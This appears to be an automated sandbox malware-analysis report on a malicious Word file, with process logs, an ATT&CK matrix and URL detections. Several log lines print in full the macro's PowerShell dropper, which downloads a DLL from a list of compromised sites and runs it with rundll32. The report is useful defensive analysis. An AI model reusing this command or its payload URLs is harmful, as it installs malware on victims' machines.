Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -- Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -- Process information set: NOOPENFILEERRORBOX (11 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -- Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (80 identical entries)
Source: C:\Windows\System32\cmd.exe -- Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information set: NOOPENFILEERRORBOX (41 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Code function: 4_2_000007FF00260F3C sldt word ptr [eax]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp -- Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: 704.doc -- OLE indicator, VBA stomping: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr -- OLE indicator, VBA stomping: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -- Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -- Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

(Columns are separated by "|"; blank cells are empty in the original matrix; trailing digits after a technique name are the count badges shown in the original matrix.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter 111 | Path Interception | Process Injection 11 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 32 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell 1 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 11 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 32 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

Behavior Graph

(Graph image not reproduced in this text extraction. Legend entries: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet.)

Screenshots

(Screenshot thumbnails not reproduced in this text extraction.)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
704.doc | 100% | Joe Sandbox ML |  | 

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP | 100% | Joe Sandbox ML |  | 

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://huskysb.com/wordpress/6f0qIQ | 0% | Avira URL Cloud | safe | 
http://huskysb.com/wordpre | 0% | Avira URL Cloud | safe | 
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE | 0% | Avira URL Cloud | safe | 
http://ckfoods.net/wp-admin/wPInm2rgMu/ | 100% | Avira URL Cloud | malware | 
http://primtalent.com/wp-admin/9yt1u/ | 0% | Avira URL Cloud | safe | 
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/ | 0% | Avira URL Cloud | safe | 
http://huskysb.com/wordpress/6f0qIQlWPaYDfa/ | 0% | Avira URL Cloud | safe | 
http://adorwelding.zmo | 0% | Avira URL Cloud | safe | 
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/ | 0% | Avira URL Cloud | safe | 
http://server.zmotpro.com/venkat/ | 0% | Avira URL Cloud | safe | 
http://adorwelding.zmotp | 0% | Avira URL Cloud | safe | 
http://manak.edunetf | 0% | Avira URL Cloud | safe | 
http://www.%s.comPA | 0% | URL Reputation | safe | 
http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/ | 100% | Avira URL Cloud | malware | 
http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/ | 100% | Avira URL Cloud | malware | 
http://primtalent.com/wp-admin/9 | 0% | Avira URL Cloud | safe | 
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P | 0% | Avira URL Cloud | safe | 
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW | 0% | Avira URL Cloud | safe | 
http://ckfoods.net/wp-admin/wP | 0% | Avira URL Cloud | safe | 

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://huskysb.com/wordpress/6f0qIQ | powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://huskysb.com/wordpre | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp | false |  | high
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ckfoods.net/wp-admin/wPInm2rgMu/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://primtalent.com/wp-admin/9yt1u/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp | false |  | high
http://huskysb.com/wordpress/6f0qIQlWPaYDfa/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://adorwelding.zmo | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://server.zmotpro.com/venkat/ | powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://adorwelding.zmotp | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://manak.edunetf | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://www.%s.comPA | powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://primtalent.com/wp-admin/9 | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P | powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://ckfoods.net/wp-admin/wP | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:526268
      Start date:22.11.2021
      Start time:13:15:10
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 31s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:704.doc
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal92.expl.evad.winDOC@5/13@0/0
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .doc
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
      • Execution Graph export aborted for target powershell.exe, PID 2776 because it is empty
• Not all processes were analyzed, report is missing behavior information
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      13:15:25API Interceptor64x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F744DDE.png
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):121507
      Entropy (8bit):7.978393301250379
      Encrypted:false
      SSDEEP:3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
      MD5:D3C11BC087FAF4372F4C5D37E06FCFFD
      SHA1:40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
      SHA-256:6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
      SHA-512:C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$*...."@.... .D.....J #B.|M.qS.M<..5......j.e.O.!vL.qa.)*D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):41984
      Entropy (8bit):5.396502435833668
      Encrypted:false
      SSDEEP:768:QoV2gfCYtBMnkyXpua8HfxV2gfCgtBMnkyXpua8H:Y6N7MkVhHG6B7MkVhH
      MD5:CE9E5A2954866976632E497655B1882B
      SHA1:D1518E3C3269FD2E6512D6045A463CBE09211E99
      SHA-256:75A2A12D357329BB6C6CAC8730CDA50728B0A37B53DEE4D585F00F235607E45E
      SHA-512:19E743670CB5B16DEE433A19EB0EBD9A31D6D36C28AF9C5944C1CD8645EF278CF07F3812B674415D67EAB4DAEAB71F0F442E63D4631E9472614F66AE2C02C144
      Malicious:false
      Reputation:low
      Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(...*...........................................................................................................................................)...+...6...O...........................................,...................................................................................................P...........................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8907FAB7-1F61-4790-AB28-47403D75A993}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):2
      Entropy (8bit):1.0
